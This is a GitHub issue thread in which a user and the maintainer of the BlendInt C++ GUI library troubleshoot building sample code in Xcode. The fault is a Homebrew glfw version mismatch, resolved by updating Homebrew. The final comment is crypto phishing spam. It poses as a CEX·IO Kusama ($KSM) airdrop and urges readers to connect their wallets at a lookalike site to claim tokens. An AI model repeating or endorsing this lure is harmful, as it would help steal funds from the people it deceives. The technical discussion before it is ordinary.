### ISSUE TITLE
error when compiling the sample code

### ISSUE THREAD

**Issue by xzwang2005** [zhanggyb/BlendInt#3]
hi,

Would you please outline the steps to build the sample code in XCode?  I managed to compile the library, but failed to do so with the "hello world" example.  Thanks!

update:  here's some more info about the error:
c++locale.h:  no member named 'vsnprintf' in namespace std::
other errors are similar to this one.  I tried other c++ dialect in xcode settings, but still get the errors

**Comment by zhanggyb** [comment]
I'll check this issue on my Mac tonight.

**Comment by zhanggyb** [comment]
I cannot reproduce this kind of error.
What's the OS X and Xcode versions are you using?

**Comment by xzwang2005** [comment]
I'm using OSX 10.10.1,  Xcode 6.2.
The errors are not related to BlenderInt codebase, but come from compiling c++ standard library and boost. It seems there are a mismatch of compiler/c++ library.  I tried different c/c++ dialect without luck.
Here's what I did so far:
1) download the BlenderInt source code and generate xcode project with cmake gui
2) compile the source code, succeeded
3) create a new project (console program) in Xcode, copy the "Hello World" example and set the search path for the headers and compiled library from 2)

I checked the settings for the source project, both c/c++ dialect are set to "compiler default" with c++11 std library.  I got errors with the same settings.  I'm not sure why the example end up compiling the std library either.

**Comment by zhanggyb** [comment]
Aha, I see.
I'll try and provide a simple guide of how to write your program in Xcode in wiki.
But won't be soon, maybe this weekend.

You could also use cmake to generate Xcode project, I have some demo code in https://github.com/zhanggyb/BlendInt_Demos. See https://github.com/zhanggyb/BlendInt/wiki/build to know how to checkout the submodule and build the demo.

**Comment by zhanggyb** [comment]
I tried to create a Xcode project today and found it's really difficult to configure the xcode project and I failed too.

That's because you have to set the headers/libraries/definitions required by this project manually in xcode. For example, the header files of freetype, platform macro required by [CppEvent](http://code.google.com/p/cpp-events/).

This problem not only occurs in Xcode, but also in other IDEs. I need more time to clean up the code and solve this issue.

Currently, if you just want to have a look at a real example, please checkout "demo" submodule and build with cmake.

**Comment by xzwang2005** [comment]
the glfw3 demo (including 'tutorial01') can be build thru command line successfully.  But it failed to compile with xcode project(generated with cmake gui, with default settings plus build glfw demo option), due to an old glfw3 version (3.0.4) installed by brew.  Because the source code bundled with BlenderInt is glfw 3.1, which does not match the header.  Uninstall previous glfw fixes the problem.

still,  a tutorial on writing a program with your library from scratch is very much needed.  Thanks.

**Comment by xzwang2005** [comment]
ok. since create a xcode project is too much work, maybe it's easier to outline steps to add new targets within BlendInt project?

**Comment by zhanggyb** [comment]
Yes, it's already in plan and I'll do this as soon as I finish another c++ project -- [libCppEvent](https://github.com/zhanggyb/libCppEvent) to replace the [CppEvent](http://code.google.com/p/cpp-events/) which is used in current code.

[libCppEvent](https://github.com/zhanggyb/libCppEvent) is more clean and comprehensible due to the C++11 features.

**Comment by xzwang2005** [comment]
thanks for the update, and keep up the good work!

**Comment by zhanggyb** [comment]
I've fixed some code bugs in recent commits. you can build the latest code, install to /usr/local (by default), and now you can configure Xcode to use this project. (Don't be supprised if you get other bug, it's still under development).

A step-by-step guide will be posted on wiki page soon.

**Comment by zhanggyb** [comment]
See this page: https://github.com/zhanggyb/BlendInt/wiki/compile

**Comment by xzwang2005** [comment]
hi,

I noticed that the external packages (glfw3, glm) are removed from the source. This requires that glfw3 being installed before BlendInt can be compiled.  However, if use Homebrew, the installed glfw version is 3.0.4, which is not compatible with BlendInt.  To make things worse, once it's installed thru Homebrew, XCode will use the installed header first, even if the glfw 3.1 path were set correctly thru cmake.

So I guess it might be helpful to clarify that for mac, user should:
1) make sure glfw3 is not installed thru Homebrew
2) build latest glfw, version 3.1 at least,  also note that it should be built as a dynamic library
3) specify header folder and the path to glfw.dylib in cmake
4) compile with cmake or generate Xcode and compile

**Comment by zhanggyb** [comment]
GLFW in Homebrew has already been upgraded to 3.1.x, the latest is 3.1.1.
Could you update/upgrade homebrew and try to build BlendInt again:

``` shell
$ brew update
$ brew upgrade --all
```

**Comment by xzwang2005** [comment]
you are right, it's fixed now.  Thanks.

**Comment by zhanggyb** [comment]
So I'm going to close this issue.
By the way, if you're using a Mac with retina display, the current code is not working.
I'm fixing this in the "retina" branch.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
